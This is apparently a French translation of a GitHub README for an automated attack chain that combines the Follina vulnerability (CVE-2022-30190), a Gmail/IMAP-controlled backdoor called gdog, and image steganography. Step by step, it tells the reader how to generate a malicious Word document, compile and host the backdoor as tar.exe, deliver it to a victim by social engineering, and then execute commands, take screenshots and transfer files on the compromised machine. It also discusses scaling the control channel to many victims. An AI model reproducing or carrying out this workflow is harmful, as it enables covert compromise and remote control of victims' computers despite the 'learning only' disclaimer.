
Une chaîne d'attaque automatisée basée sur CVE-2022-30190, backdoor email 163, et stéganographie d'image.
une chaîne d'attaque automatisée basée sur CVE-2022-30190, une backdoor email 163, et la stéganographie d'image
Merci aux dépôts GitHub suivants, nous avons référencé et modifié une partie du code pour intégrer et implémenter notre travail :
中文README请看这里
gdog :
follina :
Utilisez follina.py pour créer un fichier Word malveillant et activer l'écoute http
--ip et --output pour spécifierpython follina.py --ip 100.100.100.100 --output maldoc.docModifiez client.py et gdog.py dans gdog et remplissez les informations suivantes
gmail_user = 'your email'
gmail_pwd = 'your pwd'
server = "smtp server"
imap_server = 'imap server'
Compilez client.py en tar.exe et placez-le dans /follina/www
Utilisez n'importe quelle méthode d'ingénierie sociale pour l'envoyer à la cible. Dès que la victime ouvre Word, tar.exe sera automatiquement téléchargé et exécuté.
L'attaquant exécute gdog localement et envoie des commandes pour contrôler la machine cible. Pour l'utilisation, voir gdog
Ceci n'est qu'une démo de l'implémentation de la chaîne d'attaque. L'exe en cours d'exécution peut même être trouvé dans le gestionnaire de tâches, ce qui facilite l'observation de l'effet. Nous n'avons effectué aucune opération telle qu'anti-virus, camouflage ou élévation de privilèges. Bien sûr, ce n'est pas difficile sous Windows, n'est-ce pas ?
Le projet gdog existe depuis longtemps, et nous avons consacré beaucoup d'efforts pour le faire fonctionner avec succès. Les commandes de contrôle à distance actuellement confirmées incluent : exécution de commandes, capture d'écran, fenêtres contextuelles, arrêt, verrouillage de l'écran et transfert de fichiers. Ces fonctions suffisent pour la plupart des besoins.
Je ne sais pas pourquoi, mais il semble y avoir un problème avec la recherche SUBJECT d'imap. Nous ne pouvons pas rechercher les emails avec le sujet cible, et la valeur de retour est vide. Nous devons utiliser d'autres méthodes, comme lire tous les emails non lus, filtrer les cibles, puis remettre les autres comme non lus. Cela peut poser problème lorsqu'il y a de nombreux utilisateurs contrôlés et doit être résolu.
Ce projet est uniquement à des fins d'apprentissage et d'échange.